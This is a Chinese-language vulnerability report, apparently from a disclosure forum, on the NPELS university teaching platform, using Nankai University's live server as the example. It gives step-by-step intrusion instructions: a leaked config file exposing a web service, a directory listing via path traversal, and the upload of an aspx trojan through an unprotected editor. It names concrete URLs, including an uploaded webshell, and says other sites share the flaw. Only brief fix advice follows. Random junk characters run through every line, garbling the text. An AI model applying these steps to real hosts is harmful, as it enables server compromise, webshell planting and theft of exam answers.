好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
( n: s7 {5 k2 ~% N" ^; R- B9 ? K, g, K' x0 a
详细说明:6 Y* z' F/ n9 W* V# ~' G4 l6 m" t
& t" R. K Q( D0 |( s+ Z: w* ~ V
以南开大学的为例: % R6 a, \& U- H- @
http://222.30.60.3/NPELS- T% M8 B$ y4 k4 o! ^
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址! F: b/ a# K; R4 ^. N8 s
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
2 p: h+ O* j, N3 r7 L1 C<value>http://222.30.60.3/NPELS/CommonService.asmx</value>5 ~$ ^5 A6 m+ v- f
</setting>
G% K# i" Z; |) g0 o及版本号
; a9 o0 G8 L. i( o; V2 d<add key="TVersion" value="1, 0, 0, 2187">1 Q9 _: |( [" y) q ]1 R
</add>1 P8 V- L/ L2 ^/ O0 [3 }/ W
直接访问
? ?/ f& A% X0 \" d6 lhttp://222.30.60.3/NPELS/CommonService.asmx: X o- H6 k- F. \- |! M; x# ?0 O
使用GetTestClientFileList操作,直接 HTTP GET 列目录:& }" M3 k' k& A1 Q( ^# N; y2 W
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
2 H0 A7 A- P/ a- s进一步列目录(返回的网页很大,可以直接 wget 下来)7 f$ Y4 k9 d Q, ~& V% U) d
http://222.30.60.3/NPELS/CommonS ... List?version=../../
0 Z- E+ p( z8 G6 a# f- Y9 E T 5 x, F( }! W- d# V* x" u
发现, h5 C6 @& r7 y4 i3 j
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm* p' R1 [" Y2 W. `$ D
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头& x, Q- o& N) j( R: B
上传后继续列目录找到木马地址直接访问即可0 @0 P* Q7 m2 H( I5 ?8 [
: j# k; |8 f0 d- s# }/ v* ]OOXX8 c/ f1 L7 O# U
$ `& ]% }0 n' L$ s4 O4 B+ @: z
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
+ Y% \. \/ m8 d. Z" l漏洞证明:4 A1 r$ x; ^7 M, b; k/ K, A4 X
1 i4 \* I- q( p# u; H
列目录:, Q2 k- R! d6 @+ [% T1 G
http://222.30.60.3/NPELS/CommonS ... List?version=../../$ s* d! e8 w! g3 Z) l. d+ O
文件上传:
" \; z( K" a. \ k' S/ }http://222.30.60.3/npelsv/editor/editor.htm
* X3 f! z6 X1 p+ D* e( {
( Y9 l V' F0 U! r d上传木马:
) R5 w8 q1 ?8 s# F! lhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
! m5 F3 E& R" n 3 c6 f- u) _$ l) ]2 c% |
修复方案:: y( M; e' e; k, m8 e+ s
好像考试系统必须使用 CommonService.asmx V1 [: k; ~$ t+ a. x ^8 u( q
最好配置文件加密或者用别的方式不让它泄露出来$ \: G5 E" O0 C) o% b
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样) G9 M, [ d* l% n( T. T8 s" ]. o
|